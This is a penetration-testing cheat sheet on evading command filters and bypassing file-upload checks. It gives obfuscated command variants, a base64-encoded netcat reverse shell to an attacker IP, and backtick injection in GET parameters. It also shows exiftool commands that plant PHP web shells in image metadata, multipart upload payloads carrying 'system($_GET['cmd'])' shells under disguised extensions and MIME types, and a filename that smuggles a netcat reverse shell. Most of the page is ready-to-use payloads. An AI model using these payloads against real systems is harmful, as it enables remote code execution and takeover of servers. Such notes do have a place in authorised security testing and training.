Evasion Techniques

Evasion
If "cat" command is not available on the box, try the following.
c"a"t
ca``t
ca\t    
$(id)
;cat
||cat
&& cat
|`echo "bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo" | base64 -d`   
    bmMgMTAuMTAuMTAuMTAgNTMgLWUgL2Jpbi9iYXNo: nc 10.10.10.10 53 -e /bin/bash
GET parameter
# Place between ` ` 
http://IP:PORT/something?parameter=`ls`        
http://IP:PORT/something?parameter=`whoami`
Exiftool
Download an image and then:
1) exiftool -DocumentName="<?php echo '<h1>Something</h1>'; if(isset(\$_REQUEST['cmd'])) {echo '<pre>'; \$cmd=\$_REQUEST['cmd']; system(\$cmd); echo '</pre>'; } _halt_compiler(); ?>" index.jpg
or
2) exiftool -Comment="<?php passthru(\$_GET'cmd'); _halt_compiler();" index.jpg
Using BurpSuite
Content-Disposition: form-data; name="image"; filename="shell.php5"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
​
======================================================================
Content-Disposition: form-data; name="image"; filename="shell.jpg.php"
Content-Type: application/x-php
​
<?php system($_GET['cmd']); ?>
​
======================================================================
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: image/jpeg
​
<?php system($_GET['cmd']); ?>
Name Injection
 touch ';nc my_ip_address 1337 -c bash'
Unrestricted File Upload
Unrestricted File Upload | OWASP Foundation
File Filtering Upload
Extension Validation
File Type Filtering
    - MIME
    - Magic Number    https://en.wikipedia.org/wiki/List_of_file_signatures 
File Length Filtering
File Name Filtering
File Content Filtering
Link
​PHP Type Juggling and Authentication Bypass​
Steganography
SQL Injection Payloads
Last modified 1yr ago